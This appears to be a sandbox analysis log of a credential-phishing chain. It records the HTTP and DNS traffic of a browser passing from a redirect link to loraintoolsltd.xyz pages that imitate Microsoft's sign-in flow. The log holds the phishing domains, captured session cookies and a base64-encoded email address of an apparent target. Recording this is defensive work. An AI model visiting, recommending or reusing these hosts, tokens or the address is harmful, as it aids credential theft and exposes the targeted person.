Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: login.loraintoolsltd.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.loraintoolsltd.xyz/FgJIoRDmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=906b6aa41d244405&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1482238646:1737670630:gvnMz6WUq3EEzTkbKMXmY7htjMwlrnl7INcjpwYtlY0/906b6aa41d244405/ELjc5mh98hUEm9Vd49aH1pPIKJXUCZOHayyvUrkrAb8-1737673400-1.1.1.1-kX2zXm1bzZdEcwlyaL8ZR403rSDB27V0f.r9GcipcEjkQZUM30GkIGD4m3eKHVCe HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/906b6aa41d244405/1737673403079/Dc1M9QxjEV7BqeA HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/906b6aa41d244405/1737673403079/Dc1M9QxjEV7BqeA HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/906b6aa41d244405/1737673403088/1c87721852139d54858af8dcd971080e84136874a0279165c7e6dc4dec75dcbb/e8tYcQG-cFpJyCP HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1482238646:1737670630:gvnMz6WUq3EEzTkbKMXmY7htjMwlrnl7INcjpwYtlY0/906b6aa41d244405/ELjc5mh98hUEm9Vd49aH1pPIKJXUCZOHayyvUrkrAb8-1737673400-1.1.1.1-kX2zXm1bzZdEcwlyaL8ZR403rSDB27V0f.r9GcipcEjkQZUM30GkIGD4m3eKHVCe HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1482238646:1737670630:gvnMz6WUq3EEzTkbKMXmY7htjMwlrnl7INcjpwYtlY0/906b6aa41d244405/ELjc5mh98hUEm9Vd49aH1pPIKJXUCZOHayyvUrkrAb8-1737673400-1.1.1.1-kX2zXm1bzZdEcwlyaL8ZR403rSDB27V0f.r9GcipcEjkQZUM30GkIGD4m3eKHVCe HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /FgJIoRDm?q=P2pqOTI HTTP/1.1Host: login.loraintoolsltd.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://login.loraintoolsltd.xyz/FgJIoRDmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8; x-ms-gateway-slice=estsfd
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: login.loraintoolsltd.xyzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://login.loraintoolsltd.xyz/FgJIoRDmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8; x-ms-gateway-slice=estsfd
Source: global traffic	HTTP traffic detected: GET /login HTTP/1.1Host: www.loraintoolsltd.xyzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://login.loraintoolsltd.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8
Source: global traffic	HTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0 HTTP/1.1Host: login.loraintoolsltd.xyzConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://login.loraintoolsltd.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8; x-ms-gateway-slice=estsfd; fpc=AiumHXxYOuNFj4oY4VmBUHk; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE5nFMfJ3IbWwY4V6mtsvc6l5thtnfzcAgl7FM_XwCAgWPEfDbX-5MS-irnFE3T-M4xsRwWq5kMQSz_hUC2svPV5ogubGkg2XzkzbQSjdV88QzSy_QmGBo2UuJ4jhLnlndZMdjY73y_BIiO8K_wDSYNeMxIVFMdN14V9J_ntdAdNMgAA; stsservicecookie=estsfd
Source: global traffic	HTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true HTTP/1.1Host: login.loraintoolsltd.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8; x-ms-gateway-slice=estsfd; fpc=AiumHXxYOuNFj4oY4VmBUHk; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE5nFMfJ3IbWwY4V6mtsvc6l5thtnfzcAgl7FM_XwCAgWPEfDbX-5MS-irnFE3T-M4xsRwWq5kMQSz_hUC2svPV5ogubGkg2XzkzbQSjdV88QzSy_QmGBo2UuJ4jhLnlndZMdjY73y_BIiO8K_wDSYNeMxIVFMdN14V9J_ntdAdNMgAA; stsservicecookie=estsfd; esctx-kz8rlQGIpI=AQABCQEAAABVrSpeuWamRam2jAF1XRQEzRIUEQeY1D7eLy0UQxpcxWfgOYW4VTYJZCD75yzqGkapbvfuaYKkpTy2mv2vw2KguJ9zQ-zHquZTfpM33qLZDvn6Nzt9C_xs0-b38fDlKISNFCmoKrpmb57W8yR58RcmoEtDHD2TLqL2agxSHYKE5iAA; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
Source: global traffic	HTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: live.loraintoolsltd.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://login.loraintoolsltd.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8
Source: global traffic	HTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: live.loraintoolsltd.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://login.loraintoolsltd.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8; uaid=2d7a76ebbf584765830210384afdfe30; MSPRequ=id=N&lt=1737673427&co=1
Source: global traffic	HTTP traffic detected: GET /common/GetCredentialType?mkt=en-US HTTP/1.1Host: login.loraintoolsltd.xyzConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: b747-6a6f=44d01aaa0d40cdbad7418ddb99b7cff6486e9817f0ffac5caa68a31026a54cb8; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; esctx-kz8rlQGIpI=AQABCQEAAABVrSpeuWamRam2jAF1XRQEzRIUEQeY1D7eLy0UQxpcxWfgOYW4VTYJZCD75yzqGkapbvfuaYKkpTy2mv2vw2KguJ9zQ-zHquZTfpM33qLZDvn6Nzt9C_xs0-b38fDlKISNFCmoKrpmb57W8yR58RcmoEtDHD2TLqL2agxSHYKE5iAA; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=1.AS0AMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAAtAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEk7YvPRcILejnsM1UfrvwdbGJMpQlp_1aQhRnmx5bQAfrxRJ_YExbmtTohJou51Tr9u80yoxUddLmSc-3tGqupx7sQHvP9sxIvYjo2uTmRqwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEbh5U_b2lXXlkWdBw15H1nltYS48hzQFKvrNs8a26xJzkrxDA3rQETN_dTHEO6d90h4CXYEL0gqAU2aq7aczv3xWANpjo6qlbbFpTNOkQbwhKRcaODI7-a8rfXeqaH0leh_WcKAJj6FIqb9DR1xf3LpiKlFMtdnyxGLr6tueQGSAgAA; esctx-KeWr5fCcHs=AQABCQEAAABVrSpeuWamRam2jAF1XRQEhCKvyeaBtgfFPqn6YpqWoZqHxfdP2vHMx3-SNzYIDcX3sRa1AziUABwGDf4Dt5_5DGrfiWSZlH2oI6IcWQhmyA9-_a6PfkaqL80fuxl3kGFv7Dt6BtH4-1HEIhX8Zph4UDlyZWFW74DClBgQMRNkQiAA; fpc=AiumHXxYOuNFj4oY4VmBUHm8Ae7AAQAAANHBJN8OAAAA; MicrosoftApplicationsTelemetryDeviceId=9428b382-c0f4-4ce0-baa4-791fdd486a38; brcap=0; ai_session=QGYU4vKInuszTkIQU1Q5C4\|1737673430028\|1737673430028
Source: global traffic	HTTP traffic detected: GET /lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292 HTTP/1.1Host: demfre.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: demfre.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Referer: http://demfre.com/lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: demfre.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: demfre.com
Source: global traffic	DNS traffic detected: DNS query: login.loraintoolsltd.xyz
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: identity.nel.measure.office.net
Source: global traffic	DNS traffic detected: DNS query: www.loraintoolsltd.xyz
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: live.loraintoolsltd.xyz

Source: unknown

HTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1482238646:1737670630:gvnMz6WUq3EEzTkbKMXmY7htjMwlrnl7INcjpwYtlY0/906b6aa41d244405/ELjc5mh98hUEm9Vd49aH1pPIKJXUCZOHayyvUrkrAb8-1737673400-1.1.1.1-kX2zXm1bzZdEcwlyaL8ZR403rSDB27V0f.r9GcipcEjkQZUM30GkIGD4m3eKHVCe HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3242sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: ELjc5mh98hUEm9Vd49aH1pPIKJXUCZOHayyvUrkrAb8-1737673400-1.1.1.1-kX2zXm1bzZdEcwlyaL8ZR403rSDB27V0f.r9GcipcEjkQZUM30GkIGD4m3eKHVCesec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not Found

Source: chromecache_83.2.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css
Source: chromecache_83.2.dr	String found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback
Source: chromecache_81.2.dr	String found in binary or memory: https://fontawesome.com
Source: chromecache_81.2.dr	String found in binary or memory: https://fontawesome.com/license/free
Source: chromecache_109.2.dr, chromecache_96.2.dr	String found in binary or memory: https://login.loraintoolsltd.xyz
Source: chromecache_109.2.dr, chromecache_96.2.dr	String found in binary or memory: https://login.windows-ppe.net

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
